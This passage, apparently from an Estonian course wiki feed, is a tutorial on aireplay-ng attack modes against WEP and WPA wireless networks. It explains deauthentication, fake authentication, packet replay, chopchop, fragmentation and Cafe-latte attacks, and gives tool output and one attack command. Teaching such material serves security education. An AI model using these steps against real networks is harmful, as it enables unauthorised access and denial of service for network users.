Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30931</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30931"/>
		<updated>2011-05-10T08:53:39Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Shared Key Authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile random baidiarray(pusle).[6]&lt;br /&gt;
* Klient kasutab oma 64- vüi 128bitist salajast võtit ning krüptib saadud baidirea ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud array ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendab võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka APle pakke saata. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, broadcast disconnect on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.(?)&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud handshake&#039;id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
